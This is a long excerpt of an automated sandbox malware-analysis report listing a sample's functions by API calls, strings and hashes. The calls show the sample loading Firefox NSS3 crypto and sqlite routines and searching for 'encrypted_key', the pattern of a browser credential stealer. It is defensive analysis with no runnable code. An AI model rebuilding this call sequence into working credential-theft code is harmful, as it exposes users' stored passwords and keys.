                                                                                                                                                                                                              • Instruction ID: d3fd6aaede45d79844d4c6a22daf884b2647a9c962070a7761c6a880c11a3998
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc0f3b3bdf4ed4276ec8958bb697ee91e139c28ac475bcd832607bf3e2da64ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E5118B2D00216AFD7009F69CC8596EB7B9FF45358B1A452AEC189B700E731FD858BD1
                                                                                                                                                                                                              Function 6CA4DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6CA4DD56
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CA4DD7C
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CA4DE67
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CA4DEC4
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4DECD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 2339628231-598938438
                                                                                                                                                                                                              • Opcode ID: c9b1e889b891df5917ff2f6a57f108c4d7045cbbfbbae31ca0f33e1ed54e8a6f
                                                                                                                                                                                                              • Instruction ID: 5f81d29fd8c14473e2f9a76dda6ce456141a56934c13f7707d65c297dd0c1ed5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9b1e889b891df5917ff2f6a57f108c4d7045cbbfbbae31ca0f33e1ed54e8a6f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99A1D571B042419FC710CF29C880A6AB7F5EF85318F19C96DF8998BB51E771E885CB91
                                                                                                                                                                                                              Function 6CB0EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6CB0EE0B
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB0EEE1
                                                                                                                                                                                                                • Part of subcall function 6CB01D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CB01D7E
                                                                                                                                                                                                                • Part of subcall function 6CB01D50: EnterCriticalSection.KERNEL32(?), ref: 6CB01D8E
                                                                                                                                                                                                                • Part of subcall function 6CB01D50: PR_Unlock.NSS3(?), ref: 6CB01DD3
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB0EE51
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB0EE65
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB0EEA2
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB0EEBB
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB0EED0
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB0EF48
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB0EF68
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB0EF7D
                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6CB0EFA4
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB0EFDA
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CB0F055
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB0F060
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2524771861-0
                                                                                                                                                                                                              • Opcode ID: ea2a270ecf4df26d1a09fb9511837a6468de919f892d486b591b8a7fd8b1d65a
                                                                                                                                                                                                              • Instruction ID: f6ae2d85bedf62b8f70ae180c5fb3ad99ec3c83b795623005b8452ba5410bdca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea2a270ecf4df26d1a09fb9511837a6468de919f892d486b591b8a7fd8b1d65a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE8162B1B002899BDF01DFA5DC45ADE7BB5FF08318F144024E949A7B11E731E954CBA2
                                                                                                                                                                                                              Function 6CAD4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_SignatureLen.NSS3(?), ref: 6CAD4D80
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6CAD4D95
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CAD4DF2
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD4E2C
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CAD4E43
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CAD4E58
                                                                                                                                                                                                              • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CAD4E85
                                                                                                                                                                                                              • DER_Encode_Util.NSS3(?,?,6CC205A4,00000000), ref: 6CAD4EA7
                                                                                                                                                                                                              • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CAD4F17
                                                                                                                                                                                                              • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CAD4F45
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAD4F62
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CAD4F7A
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAD4F89
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAD4FC8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2843999940-0
                                                                                                                                                                                                              • Opcode ID: e2ddd93387dcdd21a6bf8a872422d2fd401246d4adfbc6e8be5be29921d7aa5c
                                                                                                                                                                                                              • Instruction ID: bd95498b06f5371f8682ce36bda5755c84ee6a4c15bb126fc2ffd17e5231c983
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2ddd93387dcdd21a6bf8a872422d2fd401246d4adfbc6e8be5be29921d7aa5c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E681A471908301AFE701CF24D840B9BB7F4AF88758F1A852DF958DB651EB31E945CB92
                                                                                                                                                                                                              Function 6CB15C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CB15C9B
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CB15CF4
                                                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CB15CFD
                                                                                                                                                                                                              • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CB15D42
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CB15D4E
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB15D78
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CB15E18
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB15E5E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB15E72
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB15E8B
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CB0F854
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CB0F868
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CB0F882
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(04C483FF,?,?), ref: 6CB0F889
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CB0F8A4
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CB0F8AB
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CB0F8C9
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(280F10EC,?,?), ref: 6CB0F8D0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                              • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                              • API String ID: 2028831712-1373489631
                                                                                                                                                                                                              • Opcode ID: 2c074a692026c766b57de11053d480738df3a72b7df81aa1881dae61098d3621
                                                                                                                                                                                                              • Instruction ID: 6894c67c2acb61b8961e650ec3baceee83eb3a38d99c6dcb1c059bb54ee860d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c074a692026c766b57de11053d480738df3a72b7df81aa1881dae61098d3621
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D271C0F1E082859BEB009F25DC45B6E3679FF4531DF180035E8099AF42EB32E959CB96
                                                                                                                                                                                                              Function 0093BB22 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00E324F0), ref: 0093BB56
                                                                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0093BBCF
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0093BBEB
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0093BBFF
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0093BC08
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0093BC18
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0093BC36
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0093BC46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                                                                              • String ID: $<%$X%$`%
                                                                                                                                                                                                              • API String ID: 2979504256-2428780874
                                                                                                                                                                                                              • Opcode ID: 7a934248e885e894455285702d7635d97030cbf994eb59a11d6c91cd7fd7dcc9
                                                                                                                                                                                                              • Instruction ID: 090112eab25b39a96180ed081184a965be6e15ac29504b260dc5fae077b2f15e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a934248e885e894455285702d7635d97030cbf994eb59a11d6c91cd7fd7dcc9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 545102B1D0021CAFDF28DFA9DC81AAEBBB9EF44300F14442AE655E6260DB349D45DF50
                                                                                                                                                                                                              Function 6CB06C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CB0781D,00000000,6CAFBE2C,?,6CB06B1D,?,?,?,?,00000000,00000000,6CB0781D), ref: 6CB06C40
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CB0781D,?,6CAFBE2C,?), ref: 6CB06C58
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CB0781D), ref: 6CB06C6F
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CB06C84
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CB06C96
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: TlsGetValue.KERNEL32(00000040,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1267
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: EnterCriticalSection.KERNEL32(?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB127C
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1291
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: PR_Unlock.NSS3(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB12A0
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CB06CAA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                              • API String ID: 4221828374-3736768024
                                                                                                                                                                                                              • Opcode ID: ee258af35eca94dacf01c0872f31154a8a02ce32cb985701e23f3a46d75f43ea
                                                                                                                                                                                                              • Instruction ID: 7ca1b694925d3dc9acc895df07bdb7eb7c59cea02b913e4c9d163f1bb40225d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee258af35eca94dacf01c0872f31154a8a02ce32cb985701e23f3a46d75f43ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A01D6F170238127F660277A5D4AF27395CEF91199F140431FE05E0A81FBA3E59841A6
                                                                                                                                                                                                              Function 6CABACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 786543732-0
                                                                                                                                                                                                              • Opcode ID: 854f743a429066a5ae2103d418738ee9a356000bb5b926baa4b6d13848cec606
                                                                                                                                                                                                              • Instruction ID: 940fdaee4f63a58d6fbc17e916dadbcb87cc31afd39c21ccea23efd67b4038bb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 854f743a429066a5ae2103d418738ee9a356000bb5b926baa4b6d13848cec606
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F519EB1A002269BDF00DF69D841BAE77BAFB06349F180125E805B7B00D336ED95CBD2
                                                                                                                                                                                                              Function 6CB94C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6CB94CAF
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB94CFD
                                                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6CB94D44
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                              • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                              • API String ID: 2274617401-4033235608
                                                                                                                                                                                                              • Opcode ID: acf041818214407f200833686626bd0e881e7e7d72ffc1466b645c8bc01a0617
                                                                                                                                                                                                              • Instruction ID: 750385bab24e95a91efe95c4341d89e279767c5ced6e651b3f5a60d0cadb9b65
                                                                                                                                                                                                              • Opcode Fuzzy Hash: acf041818214407f200833686626bd0e881e7e7d72ffc1466b645c8bc01a0617
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7313A76E089E26FD7084624A8017A5B371FF83318F160135D4345BF65DB21AC5A8FE3
                                                                                                                                                                                                              Function 0093584D Relevance: 18.2, APIs: 12, Instructions: 189stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00935885
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00935896
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 009358C1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 009358DF
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 009358F3
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00935906
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931D67: GetFileAttributesA.KERNEL32(?,?,?,0092DA54,?,?,?), ref: 00931D6E
                                                                                                                                                                                                                • Part of subcall function 0092819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0092CC65,?,?), ref: 009281E5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 009321BC: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0093599C,?), ref: 009321C7
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000), ref: 009359AA
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00935ACE
                                                                                                                                                                                                                • Part of subcall function 00928048: CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928060
